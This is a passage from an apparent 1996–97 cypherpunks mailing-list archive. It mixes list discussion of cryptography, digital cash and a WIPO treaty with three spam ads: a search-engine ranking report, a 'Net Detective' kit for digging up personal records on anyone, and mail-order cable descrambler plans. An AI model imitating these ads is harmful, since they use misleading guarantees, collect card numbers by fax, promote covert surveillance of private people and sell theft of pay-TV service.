                          co-inventor of secret sharing                  
                               
               11:45 Break                                              
                                                                        
               13:45 The State of the Art in Computational Number Theory
                       by ERIC BACH, University of Wisconsin, Madison.  
                          co-author of "Algorithmic Number Theory, Vol. 1"
                                                                        
               14:30 Coffee                                             
                                                                        
               15:15 Opening ceremony and introduction of keynote speaker.        
                                                                        
               15:30 The Importance of Cryptography to Industry         
                       by WHITFIELD DIFFIE, Sun Microsystems
                          co-inventor of public key
                                                                        
               16:30 Reception                                         

Related event: Friday November 22, Computer Science Seminar Series Lecture.

               15:30 Robust and Efficient Sharing of RSA Functions
                       by TAL RABIN, IBM T.J. Watson Research Center

You are cordially invited to attend the opening. For upcoming information,
such as the vitae of the speakers, the location of the event, the Center's
faculty members, driving instructions, consult: http://www.cs.uwm.edu/~cccns

Free registration requested. Please register by e-mail to cccns@cs.uwm.edu
Indicate whether you also plan to attend the lecture of Tal Rabin on Friday
November 22. Include your name and address.


          George Davida           Yvo Desmedt           Rene Peralta
          Professor               Professor             Associate Professor
                                  Director

The Center's purpose will be to advance knowledge in the areas of cryptography,
computer security, network security and related areas from theoretical as well
as practical viewpoints. For more details see: http://www.cs.uwm.edu/~cccns

------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brian@firstgear.com.firstgear.com
Date: Sat, 8 Nov 1997 15:44:25 -0800 (PST)
To: brian@firstgear.com.firstgear.com
Subject: YOUR LISTING ON YAHOO!
Message-ID: <199611080646.GAA13297@mail.firstgear.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi:  This email is in  reference to YOUR LISTING ON YAHOO!  

If you are interested in placing your web site in the TOP TEN on the major
search engines, please read on.

(If not, please disregard this email and accept our apology for any
intrusion.) reply with remove in the subject.

For those of you who are interested, please read on!

(Ed. note: Yahoo asked that we mention that our group and Yahoo are not
affiliated --they probably wouldn't let us publish this if we were affiliated).
____________________________________________________________


                      SEARCH ENGINE SECRETS
                        

                 HOW YOU CAN GET YOUR SITE CONSISTENTLY 
                          IN THE TOP 10
                      ON MAJOR SEARCH ENGINES
                (and watch your hit count skyrocket)

                                             
                 http://www.servicebrokers.com/SES3.htm



As you probably noticed with the listing of your site on the search engines,
it is becoming more and more difficult to be found among the MILLIONS of
listings.  

If you"re like the rest of us you have found it extremely frustrating. You
spend lots of time and money developing your site and then you're listed
number 30, or 80, or even 200th.  You're NEVER FOUND.


                    ***************************
                            GOOD NEWS


The good news is we have found a SOLUTION. After months of fighting the
search engine battle we got LUCKY. 

A programmer recently became associated with our firm who had done some
CONSULTING WORK for six months with one of the major search engines. With
his help we developed a REPORT on the major search engines and how they
really work.
 

                   *****************************
REPORT 

His report is excellent. We have been using the material in the report for
over five months. IT WORKS!  With it, our sites are in the top TEN listings
on all major search engines and we have experienced a virtual stampede of
people to the web sites.  

                     
HITS ARE UP, SALES ARE UP, and most importantly, everyone is HAPPY.

>
>                    ***************************
                            YOUR COPY
>
>
Now, YOU CAN HAVE A COPY of his report.  In it you will find:
>
>
>
>          How to vault in the TOP TEN  on any search engine using any
keyword. Strategies that put you ahead of 95% of the other sites online.

           How to STAY in that TOP TEN.

           How to improve your chances of being found in about 10 MINUTES.
>
>          How the search engines calculate CONFIDENCE ratings (and what
that means to you).  
>
>          Killer META TAGS that totally blow away your competitors.
>
>          Which search engines are the very BEST FOR YOU.
>
>          How to get your site REGISTERED for FREE at over 200 locations,
in one easy step (it takes 10 minutes).
>
>          How to BLOCK out part of your site from the search engines (and
why you should do it).
>
>          The effect of REPEATING KEY WORDS. (good or bad?) What happens
when you repeat them too many times?
>
>         LATEST FORMS for developing the best meta tags. Meta Tag
strategies that can broaden your audience and build high volume web traffic
for you.  

We tell you exactly what to do and show you SPECIFIC EXAMPLES.  And it's
SIMPLE and EASY to understand.  So you can put the principles to immediate use.
>
>          The benefits of site UPDATING.  How often?

           What NOT to do! Avoid making those errors which can cost you.
>
>
>                         and even
>
>          How to legally "steal" your competitor's web traffic and send it
to your site. Type in your competitor's name and YOUR NAME will appear FIRST! 
>
>
>                    ***************************
>                  
>                        WHAT DOES IT COST?
>
>

The material is only $19.95, and is unconditionally guaranteed to work for you.

Just follow the instructions and you will find your site in the top ten too.

Ordering is SAFE and EASY. For more information, or to RECEIVE this 18 page
report by email just go to our INSTANT-DELIVERY SECURE order form at:


            http://www.servicebrokers.com/SES3.htm

(Order on line and you will receive your report in JUST 60 SECONDS.)



Now that your site is up shouldn't you take this MOST IMPORTANT LAST STEP so
people can find it.


                  ******************************                        
                     UNCONDITIONAL GUARANTEE  


Remember, we UNCONDITIONALLY GUARANTEE IT WORKS.
  
You can't lose.


                  ********************************
                       SPECIAL FREE BONUS


Order within 48 hours, we and will include, AS A FREE BONUS, information on
over 500 SEARCH ENGINES and directories where you can list your site for
free. (Some are very specialized and targeted).


SPECIAL NOTE: If you are busy and don't have time to go to our web site
INSTANT-DELIVERY SECURE ORDER FORM, you can order by FAX. (The unconditional
guarantee still applies!) 


Just fill in the FAX FORM AT THE BOTTOM OF THIS PAGE.  Then FAX it to us at:
>
>                            1-305-289-1884
>

If you order by FAX your copy of the report will be sent to you by email
within 24 hrs. Or, if you prefer, you can send your order with a CHECK by
snail mail to the address below. (Be sure to include your email address for
delivery.)


Whichever method you choose to order, YOU'LL BE GLAD YOU DID!

 Best of luck with your web site!




Leeds Publishing
5800 Overseas Hwy., St. 35-154
Marathon Key, Fl.  33050
Fax 305-289-1884
 http://www.servicebrokers.com/SES3.htm

________________________________________________________________________
                            
>________________________________________________________________________

>                                  FAX ORDER FORM
>                              (Please print clearly)
>
>FAX TO: Leeds Publishing
>
>FAX NUMBER: 1-305-289-1884

Hi:  Here is my order for Search Engine Secrets at $19.95 only. I understand
it is unconditionally guaranteed. Include my FREE BONUS of 500 search
engines.  Send by email ASAP.

Date:__________________
>
NAME:_______________________________________________
>
E-MAIL
ADDRESS:______________________________________________________________
(PLEASE be accurate.  One small error and we can't send your order).
>
>CARD TYPE:_________________
>
>CARD NUMBER:_________________________________________________
>
>EXPIRATION DATE:______________
>
>NAME ON CARD:________________________________________________
>
>
>Thanks for ordering.  Your copy of the report will be sent to you by email
ASAP.
>
>____________________________________________________________
>____________________________________________________________
>
>
>Copyright 1997 Leeds and Rousseau Publishing.  All rights reserved.
Form 102 GD-Yahoo
>














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brian@firstgear.com
Date: Sun, 9 Nov 1997 18:45:08 -0800 (PST)
To: brian@firstgear.com
Subject: Your Internet Privacy
Message-ID: <199611090943.JAB04289@mail.firstgear.com>
MIME-Version: 1.0
Content-Type: text/plain




                           "NET DETECTIVE"
                     
                     EASY WAY TO FIND OUT ANYTHING 
                              ABOUT ANYONE
                            ON THE INTERNET
                    (Special Business Owner's  Edition}


                    http://www.servicebrokers.com/DET3.htm


DID YOU KNOW THAT:

With the internet you can discover EVERYTHING you ever wanted to know about
your EMPLOYEES, FRIENDS, RELATIVES, SPOUSE, NEIGHBORS, even your own BOSS!
You can check out ANYONE, ANYTIME, ANYWHERE, right on the internet...


The Internet is a HUGE and POWERFUL SOURCE of information, if you
only know WHERE TO LOOK. 

You WOULD be amazed to discover the amount of PERSONAL information
other people can find out about YOU! Or you can find out about THEM.

             *******************************************

                   INFORMATION AVAILABLE ABOUT YOU


Right now,  with just your name and address, I can find out what you do for
a living, name and age of your spouse and children, the make and color of
your car, the value of your home, (and probably how much you paid for it),
credit information, your employment records,  family tree,  military
records, which web sites you visit, etc., etc., etc. I can even find that
long forgotten drug bust you had in college.

AND THAT'S JUST THE BEGINNING, but you get the idea.


                 ******************************************


                              GOOD NEWS


The good news is that now YOU can find the same information, and more, about
almost anyone.

We have compiled a  MAMMOTH  COLLECTION of internet investigative tools that
will provide you with ...

*  Over 210 gigantic internet resources and URLs to locate  people,
credit records, social security, current or past employment,
   mail order purchases, addresses, phone numbers, maps to city    locations...
   
	
	It's truly incredible, the information available...


                  ***********************************

            
                              YOUR COPY

Now, YOU CAN HAVE A COPY  of this gigantic resource.  Here are just a few of
the things you can do with it: 

*  Check out business associates and employees.
	
                                   
* Someone owe you money?  Now you can track them down and find hidden   assets.

* You can locate an old friend, a missing family member, classmate,
   even a lost love.  

*  Find e-mail, telephone or address
   information on anyone! Even look up "unlisted" phone
   numbers!

* Investigate your family history!
   Check birth, death,  or social security records.
   Check service records of Army, Navy, Air Force or Marine Corps.
 
*  Check your own credit reports so you can correct WRONG information
that may be used to deny you credit.
 
*  Trace your FAMILY TREE.

*  Check adoption records.  Find long lost or missing children or    parents.

*  Check out your daughter's new boyfriend!

*  Find trial transcripts and court orders!

*  Find out how much ALIMONY your neighbor is paying.

*  Find EMPLOYMENT opportunities ALL OVER THE WORLD!

*  SCREEN PROSPECTIVE EMPLOYEES --
   Check their credit, driving or criminal records
   Verify income or educational accomplishments

              
                                 AND

*  You'll even find TIPS to help you "discover" the amount of someone
else's INCOME.

             

                    *********************************

                          WAIT, THERE'S MORE!

You will also discover:

     * How to "CLOAK" your email so your TRUE email address can't be discovered.

     * How to make phone calls through a third party so the number called
doesn't appear on your phone bill.

     * Where to find a list of SPEED TRAPS throughout the USA.

     * How to check out the ETHICS and business practices of businesses
worldwide, including those on the internet.

     * Where you can get SECURITY PRODUCTS such as recording and tracking
equipment, bomb detectors and much more.

     * Information on UNTRACEABLE ASSET protection (anonymous banking) and more

     *  How to locate MILITARY records from Viet Nam, Korea, WW II, etc...

     * How to search LEGAL opinions, trial transcripts, etc...

     *Find Wanted FUGITIVES -- maybe your secretive neighbor!

     *Great for checking out PROSPECTIVE EMPLOYEES.  EVERY BUSINESS SHOULD
HAVE A COPY!  Allows you to check for driving and criminal records BEFORE
you hire them.


RESEARCH YOURSELF FIRST! You may be astounded at how much data is available
on the internet about YOU, YOUR FAMILY, AND YOUR BUSINESS.

There are THOUSANDS of BUSINESS and PERSONAL USES for these tools.

    ********************************************************************



                        "NET-DETECTIVE" 

Now, YOU CAN HAVE YOUR OWN COPY OF NET-DETECTIVE!


With it you can VERIFY your own records, or find out the information  you
want and need to know about others for personal and business reasons.

And this  huge collection is ONLY THE BEGINNING! While not all the sites are
free, many are. And at many  you'll find even MORE links to even MORE
information!

             ********************************************* 

                             HERE'S MORE!

* With this research kit you'll discover what information is available to
you, and the EXACT URL to get you there!

* Includes easy-to-browse, categorized compilation of information,
with a simple and easy to understand explanation of how to use each site,
and what you'll find when you get there -- with shortcuts to extract the
most current and  best data available anywhere!


INCLUDING ...

Personal ads, logs of personal e-mail, any mention of individuals
anywhere on the internet (including PRIVATE bulletin boards),
lists of resources to find even more information (private
investigators, etc...), how to leverage one database against
another, up-to-the-second news reports on any subject you choose,
and MORE...  


With  "NET DETECTIVE" you can explore the HIDDEN PAST of anyone;  and
discover those LITTLE SECRETS EVERYONE HAS HIDDEN.


>        *************************************************
>                  
>                      WHAT DOES IT COST?
>
>
Order within 48 hours and you get the entire kit of investigative tools
(approximately 35 printed pages) at a special reduced price of just $22.
(The regular price for the kit is $35). 

Our order forms are SAFE and SECURE. The material is UNCONDITIONALLY
GUARANTEED to work for you. Over 1,000 hours of research and testing went
into the development of this material.  And now it can be yours.

Just follow the instructions below, and your copy will be delivered to you
by email so you can have it IN YOUR HANDS WITHIN MINUTES from now. 

              **********************************************

                         SPECIAL FREE BONUS

Order within 48 hours and we will also include as a special  FREE BONUS, a
copy of our INVESTIGATIVE SOURCES PROGRAM. This program contains the tools
and resources used by private investigators across the country and comes
with its own Windows/Win95 interface making it quick and easy to use.

                            

              ************************************************

                           UNCONDITIONAL GUARANTEE


Remember, as with all of our publications,  we UNCONDITIONALLY GUARANTEE IT
WORKS and that you will be delighted with it.  YOU CAN'T LOSE. 


              ***************************************
                   
                            HOW TO ORDER

Ordering is SAFE and EASY! For more information, or to RECEIVE this 35 page
report and your bonus materials by email just go to our INSTANT-DELIVERY
SECURE ORDER FORM at: 


                http://www.servicebrokers.com/DET3.htm


SPECIAL NOTE: If you are busy and don't have time to go to our web site
INSTANT-DELIVERY ORDER FORM, you can order by FAX. (The unconditional
guarantee still applies!) 


Just fill in the FAX FORM AT THE BOTTOM OF THIS PAGE.  Then FAX it to us at:

  
                        1-305-289-1884

                              
If you order by FAX, your copy of NET DETECTIVE will be sent to you by email
within 24 hrs.

OR. if you prefer, you can send your order by SNAIL MAIL to the address
below.  (Be sure to include your email address for delivery.) We will send
your copy BY EMAIL the same day the order is received.

ORDER NOW!  YOU'LL BE GLAD YOU DID!



Leeds Publishing
5800 Overseas Hwy., St. 35-154
Marathon, Fl.  33050
Fax 305-289-1884
http://www.servicebrokers.com/DET3.htm




___________________________________________________________________
___________________________________________________________________


                         FAX OR MAIL  
                          ORDER FORM
                     (Please print clearly)
                    (Report is sent by EMAIL)


FAX TO: Leeds Publishing
         1-305-289-1884

OR

MAIL TO: Leeds Publishing
         5800 Overseas Hwy., St. 35-154
         Marathon, Fl.  33050


Hi:  Here is my order for  "NET DETECTIVE"  at $22 total. I understand it is
unconditionally guaranteed.  Include my FREE DOUBLE BONUS copy of
INVESTIGATIVE SOURCES--WINDOWS/WIN95.  Send by email ASAP.

Date:__________________

>
NAME:_______________________________________________
>
E-MAIL
ADDRESS:______________________________________________________________(IMPOR
TANT PLEASE double check your address and PRINT CLEARLY. One small error and
we won't be able to deliver your order.) 

>
PAYMENT METHOD (check one)     ___ Credit card   ___ Check or Money Order
Enclosed
 
>CARD TYPE:_________________
>
>CARD NUMBER:_________________________________________________
>
>EXPIRATION DATE:______________
>
>NAME ON CARD:________________________________________________
>
>
>  Your copy of NET DETECTIVE  and bonus materials will be sent to you by
email ASAP.

Thanks again for ordering!


Brian Leeds
Leeds Publishing
>
>____________________________________________________________
>____________________________________________________________
>
>
>Copyright 1997 Leeds Publishing.  All rights reserved.
Form 10-24 GD-ND
>



































From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: builders@firstgear.com
Date: Wed, 19 Nov 1997 22:28:30 -0800 (PST)
To: builders@firstgear.com
Subject: CABLE descrambler plans!
Message-ID: <199611191328.NAA04661@mail.firstgear.com>
MIME-Version: 1.0
Content-Type: text/plain


EDUCATIONAL CABLE DESCRAMBLER PLANS

You can build an educational Cable TV descrambler at home.  You can use this device to reinforce your understanding of TV audio and video encoding used on broadcast and cable TV systems.

Note:  If you would prefer not to receive these and other offers in the future, please see the list removal instructions at the end of this message, and please pardon our intrusion.

=============  View all PREMIUM and PAY-PER-VIEW channels  =============

This unit will allow you to descramble subscription and pay-per-view channels, allowing you to see how these scrambling technologies operate, and the varying effects they have on the underlying signal.

This unit can be built from seven (7) parts available from your local electronics shop which usually cost under $15.00.

Our product is an information kit containing a parts list and easy to follow, step-by-step instructions on how to build the cable descrambler from a few inexpensive parts available at your local electronics store.

Your descrambler will allow you to sample ALL the Premium and Pay-Per-View channels as long as you subscribe to BASIC cable service.

The assembly is very simple and does not require any kind of electronic training or experience.  Just follow the clear instructions and simple diagram and you will be enjoying your extra channels in as little as an hour.

So learn what goes on behind the scenes!  Order your cable descrambler package
today for a one time fee of only $13.95.

<cut here>=================================================================

ORDER FORM: Educational Cable Descrambler Plans


Circle One:     Cash     Check     Money Order


Guaranteed Fee $13.95.  I need you to RUSH processing. Please add $5.00:

Total enclosed:  $_______


Please make payable to:  OPPBUILDERS
Fill out the following information and MAIL TO:

OppBuilders
P.O. Box 38104
Baltimore, MD  21231


Name_____________________________

Address___________________ City ___________ State _____Zip __________

Phone #(____)____-________   * Email_________________________________

* will be delivered by Email if you provide this information

<cut here>=================================================================


LIST REMOVAL INSTRUCTIONS
=========================

Simply reply to this message, and type the word REMOVE anywhere in the subject or body of the message.  Our automated reply readers will transfer your email address to our filter list, and your address will be bypassed for any future mailings or lists which may include it.


Thank you for your time.

Sincerely,

OppBuilders






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 1 Nov 1996 01:28:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: 'what cypherpunks is about'
In-Reply-To: <199610260031.BAA13872@typhoon.dial.pipex.net>
Message-ID: <v03007801ae9f73686609@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:30 AM -0600 11/1/96, snow wrote:
>Mr. Hassen wrote:
>> But remember people are NOT sheep and nothing
>> lasts forever.
>
>     Yes, they are, and death does.
>
>     Loans to third world counties are made (obstensively) to help industry
>and farming to be developed, and to improve the conditions of the people. It
>rarely works that way, and I think it is a wasted effort, but it is better
>than nothing.

We mine the copper they have no money to mine and pay them with worthless
trinkets like penicillin, schools, and roads.

We are exploiting them.

Yep, they are better off in a state of natural grace, eating grubs and with
a life expectancy of 35.


--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Fri, 1 Nov 1996 02:44:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: When did Mondex ever claim to be anonymous?
Message-ID: <199611011038.CAA03167@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Re: When did Mondex ever claim to be anonymous? 
Derek wrote:

<Snip>

>	They say: "In everyday use Mondex transactions are private, like cash"
>at http://www.mondex.com/faq.htm#anon
>
>	Thus they are making two claims:
>	1. Cash is anonymous.
>	2. Mondex is like cash.

Along with one proviso: "In everyday use"
                        ^^^^^^^^^^^^^^^^^

Clearly, to them, the IRA (or possibly the local hash dealer) is not an
"everyday use" situation.

The value of provisos like this, to companies and politicians, is hard
to understate. Bill Clinton really meant to "End welfare as we know it."
                                                         ^^^^^^^^^^^^^^
Voters saw the statement, ignored the proviso, and liked it; hardly any
of them imagining that his proviso could include plans for a drastic
_increase_ in the size and scope of the U.S. welfare state.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 1 Nov 1996 07:09:47 -0800 (PST)
To: Anonymous <nobody@replay.com>
Subject: Re: Cranky Listserver?
In-Reply-To: <199610311205.NAA21204@basement.replay.com>
Message-ID: <327A1159.131@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> Is anyone else having trouble getting their posts picked up on the list?
> Messages I send to: cypherpunks@toad.com sometimes have to reposted as
> many as three times before I see them in my incoming list traffic.

Try waiting longer, even a day or two, before reposting.

It really saves on the duplicate traffic!!

The interconnectedness of the various internet servers, plus the usual anomalies of
electronics and real-world software, mean you can't predict when a particular posting
will "come through".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Tunnicliffe" <Tunny@inference.com>
Date: Fri, 1 Nov 1996 07:41:03 -0800 (PST)
To: "'Hal Finney'" <hal@rain.org>
Subject: RE: Discrete logs 1
Message-ID: <c=US%a=_%p=Inference%l=LANDRU-961101154011Z-9245@landru.novato.inference2.com>
MIME-Version: 1.0
Content-Type: text/plain


[...Interesting discussion of logarithms deleted...]
The discrete logs used in crypto have very different mathematical
properties than regular logarithms, but I thought this bit of history
would spark some memories in old-timers and give a new perspective for
younger people.

Hal

As an apparent old-timer (calculators weren't common until my college days, 
which puts me a couple of years before you, I guess) I enjoyed the 
retrospective, and I even recall the joke that goes with the punchline you 
quoted.  It's amazing to realize that only a few years ago, we were 
calculating orbital trajectories using logarithms by lining up marks on 
little sticks of wood!  I have to admit, though, that I was a little 
disappointed after your opening paragraph, because what I was really hoping 
to hear was a straightforward explanation of discrete logs, which, as you 
say, are entirely different.  A simple layman's explanation of what they 
are and how they're useful in crypto would be nice, especially since PGP is 
moving toward this (just when I was beginning to get a handle on RSA!).

Now that I have an interest in all this, I wish Rich Schroeppel still 
worked here (he worked at Inference when I started here in '88, and has 
since done a lot of pioneering work on discrete logs).  Me, I'm still 
trying to figure out what sort of seed is best to plant in a Galois 
field...

Tunny
======================================================================
 James A. Tunnicliffe   | WWWeb: http://www.inference.com/~tunny
 Inference Corporation  | PGP Fingerprint:   CA 23 E2 F3 AC 2D 0C 77
 tunny@Inference.com    |                    36 07 D9 33 3D 32 53 9C
======================================================================



begin 600 WINMAIL.DAT
M>)\^(@T/`0:0" `$```````!``$``0>0!@`(````Y 0```````#H``$(@ <`
M& ```$E032Y-:6-R;W-O9G0@36%I;"Y.;W1E`#$(`06 `P`.````S <+``$`
M!P`H``L`!0`>`0$@@ ,`#@```,P'"P`!``<`* `,``4`'P$!"8 !`"$```!#
M-#$W,#$T0T8Q,S-$,#$Q.3,P03 P04$P,$$U1C8P1 #O!@$-@ 0``@````(`
M`@`!!( !`!0```!213H@1&ES8W)E=&4@;&]G<R Q`$H&`0.0!@!T" ``&@``
M``,`)@```````P`V```````>`' ``0```! ```!$:7-C<F5T92!L;V=S(#$`
M`@%Q``$````;`````;O'F<4U)C98U#*Q$="3"@"J`*7V#0`;.WUC``,`+@``
M`````P`&$'M@494#``<0:04``!X`"! !````90```$E.5$5215-424Y'1$E3
M0U534TE/3D]&3$]'05))5$A-4T1%3$5414142$5$25-#4D5414Q/1U-54T5$
M24Y#4EE05$](059%5D52641)1D9%4D5.5$U!5$A%34%424-!3%!23U `````
M`P`0$ 0````#`!$0``````(!"1 !````:@4``&8%``!_" ``3%I&=7AM`T?_
M``H!#P(5`J0#Y 7K`H,`4!,#5 (`8V@*P'-E=.XR!@`&PP*#,@/&!Q,"@P8S
M!$8"`'!R<3$@UPA5![("@S03#7T*@ C/Q0G9.Q?_,C4U`H *@8,-L0M@;F<Q
M,#,4(.$+`VQI,S8-\ M5%B)%# %C`$ @6RX=4$D7`C $D >0= N 9R!D*00`
M8W4$$&D"("!O%&8@%Y!G"L!I=&AV;00@#;!L$@`)@!U175\*APMD$O(,`130
M;QV@8_$%0%1H91XS& `=H!\25P0@'H )@" +@" %`'GI!3!O(!' =B* )) D
M$&\>,0W0';$"," `P!^ 9;DEL6EC!T *A2'A< 20GQWP!Y$?@ .1& !G=0M@
M0P7 'R@L(&)U!4!)\R>!"&!G: 5 'X $`"D0OQ]P'N(J$21 )! *A7<(8.IL
M([!S"K%K*_ #<"* /P> !& (@00@(]$&\&0M-QWP!X 1X" `<".P9VGQ))%A
M(&X'T2<1+ `B(>LN<@(0<@J%>0A@&P`5<;<G$"<`'_ N"H4*A4@F5[\;;Q0#
M"_$QQ@K[')E!+@*=+A!P-+$E<BUW("@F0:\>< M@*O$$('<E4B<%0'T%H&T$
M8 .@,) =\ ,@;9\D\!=Q'_ PL!XP87DH\?YW*A 1L";0*3 $("R!+K#-!:!U
M,2$>XGEE$=$I$/\-P 6P(H P<2D`*6 H``>0S',I*5$)\&IO/- CL/LET2?1
M= -@+T8I`"XB/H&_)) GPB9!`R _(C[ :R* \R>1!4!G;P>1`_ ?@#\3/3N0
M;A&P&\ NT#!B('&6=2(!(# @*5!T)RX!/0# >AX")$$8``= :7K[0>4"(&PD
M\"ZP)4 'X#S4_F%"4#L1(H XTB/P."4>`H\%L"I1!T G@')A:B(A[RSD'H >
M`A\I8B3P0X$>`O\\4"6A+# $(![!&\ "0#QQO1WA8TQR'P`KH 1P(42!XR1D
M)$%A9&T?<"D`*83G3T)"(2E@=V$N`4S&'D']-M%O"X @$2X0`8 5<3!QOP7 
M)P%+PS2Q1X!)H'!/L?\],"9 (X$[(5 '1:)&D2F0?G!%-2)P*W)08QW@2:!I
M7RG!+]%04 L@/I!X"U%N_R81'L0BJSL50#$$($/244#N>4 Q/7$E<6D8`$:1
M)1?]1'%!*_ '<#QB"V &P !P_T3!5\U44R711J$]<2XB*9#;!^!>PB<]<2.!
M9B@0(\G_*Z0],"[ )C! (0>0+U$',8=&D4IQ8A @4$=0(\ Y.\%O=D4T5W,J
M`RAJ?QZ !4 [,$#14#0],"Y@;K]+PR1!,+ %0"ZP)Z%D/')!`Z!24T$A*3%=
M3O]?HU #)',#D5&2'<(CPD$TKP0`/=(#\3MP4CM24Q&P_0-@93;@'^!-,D%!
M*Z L,'<CH2)P/7$H(G%MA5 ";O\E0V,Q964=X K 4;)M\R/1>"<X.$ T$< $
M(&,$9/\"("Z2%Y J<U60<G$&<1X17VV"3)(BJV@@1(!-0"%)K"=M;14_@'E%
M-697`/\(<#R!*3%44RQ@`" >XA'P/R.B/1)E,21!5^)JQ"!'?P= 48 $('<`
M'^ @,C%L5/4PD&XK)CU\SWW??N]__[(]-(4@2D3P!Y%!1' ?? (F,!O )3%$
M@"!\(&)7@S!E8CHD8 ) <- Z+R]WA! N"X!O1>(N.5$O?G1\&6\9"%"^<E%P
M2:!8,X,!8V)&'@%?!) 4T%&1@X!$@$-<8#(H,R!%$B!&B1!!0Y&(\$0@,(F@
M-S>!)OV%0T!O)X3B@N&#`8Q/1(##&^")X#<@1#F-<(D0*C.)T#,2(#6)$#E#
M?WQ?C_^1#Y(?@)XTA1<A``&4X ``0 `Y`)!VJ_<*R+L!`P#Q/PD$```"`4<`
M`0```#$```!C/553.V$](#MP/4EN9F5R96YC93ML/4Q!3D1252TY-C$Q,#$Q
M-30P,3%:+3DR-#4``````@'Y/P$```!*`````````-RG0,C 0A :M+D(`"LO
MX8(!`````````"]//4E.1D5214Y#12]/53U.3U9!5$\O0TX]4D5#25!)14Y4
M4R]#3CU454Y.60```!X`^#\!````%0```$IA;65S($$N(%1U;FYI8VQI9F9E
M``````(!^S\!````2@````````#<IT#(P$(0&K2Y" `K+^&"`0`````````O
M3SU)3D9%4D5.0T4O3U4]3D]6051/+T-./5)%0TE0245.5%,O0TX]5%5.3ED`
M```>`/H_`0```!4```!*86UE<R!!+B!4=6YN:6-L:69F90````! ``<PX,:E
M>@G(NP% ``@PL&T6^ K(NP$#``TT_3\```(!%#0!````$ ```%24H< I?Q ;
MI8<(`"LJ)1<>`#T``0````4```!213H@``````L`*0``````"P`C```````"
M`7\``0```% ````\8SU54R5A/5\E<#U);F9E<F5N8V4E;#U,04Y$4E4M.38Q
M,3 Q,34T,#$Q6BTY,C0U0&QA;F1R=2YN;W9A=&\N:6YF97)E;F-E,BYC;VT^
#`+)S
`
end




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Kinchlea <security@kinch.ark.com>
Date: Fri, 1 Nov 1996 08:30:43 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: 'what cypherpunks is about'
In-Reply-To: <v03007801ae9f73686609@[207.167.93.63]>
Message-ID: <Pine.LNX.3.94.961101082537.497J-100000@kinch.ark.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Nov 1996, Timothy C. May wrote:
> 
> We mine the copper they have no money to mine and pay them with worthless
> trinkets like penicillin, schools, and roads.
> 
> We are exploiting them.
> 
> Yep, they are better off in a state of natural grace, eating grubs and with
> a life expectancy of 35.
> 
> 
> --Tim May

What a perfectly wonderful narrow point of view. You aren't trolling
are you? I can't believe you are that naive, but perhaps it hurts too
much to see the truth, I know that it hurts me even as I remain
powerless to do anything about it.

cheers, kinch






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 1 Nov 1996 05:38:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Primer on WIPO Treaty
Message-ID: <1.5.4.32.19961101133710.006af7e0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


From: notes@igc.org

-----------------------------------------------------------------
Info-Policy-Notes - A newsletter available from listproc@tap.org
-----------------------------------------------------------------

October 29, 1996

A Primer On The Proposed WIPO Treaty On Database Extraction 
Rights That Will Be Considered In December 1996*

James Love, Consumer Project on Technology


Introduction

The World Intellectual Property Organization (WIPO) will
consider in December 1996 a new treaty that would require most
countries (including the United States) to severely curtail the
public's rights to use pubic domain materials stored in "databases."
Some experts say it is the "least balanced and most potentially anti-
competitive intellectual property rights ever created."  The U.S.
Patent and Trademark Office (PTO) is accepting public comments on
this treaty, and a digital copyright treaty that is also troubling.
Comments are due by November 22, 1996, and can be submitted by
electronic mail to: diploconf@uspto.gov.  Copies of the treaty,
commentary, and the PTO federal register notice is available from
http://www.public-domain.org.  This memorandum provides background
information on the treaty and the problems it presents.

[Snip balance of excellent paper]

James Love
Consumer Project on Technology
http://www.essential.org/cpt
email: love@tap.org

*HTML version at http://www.essential.org/cpt/ip/cpt-dbcom.html
Ascii version formatted with 11 pt courier with 1 inch margins.
This is my first take on the treaty, and I would appreciate
comments and corrections.  This is a very important matter that
hasn't received much attention. jl

----------

We've put this primer at:

     http://jya.com/wipoprim.txt

Thanks to James Love.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 1 Nov 1996 06:52:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Sorry, nyt
Message-ID: <1.5.4.32.19961101145104.006a0c20@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


We were unfair to call news-reading by gatekeeper.nytimes.com
of jya.com "snooping." We apologize to gatekeeper for that 
mischaracterization.

And for disclosing here access info which should be private.

The site is open to anyone, the more anonymous the better. 
Use anonymizer.com.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Fri, 1 Nov 1996 01:19:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: Montgolfiering Spoof
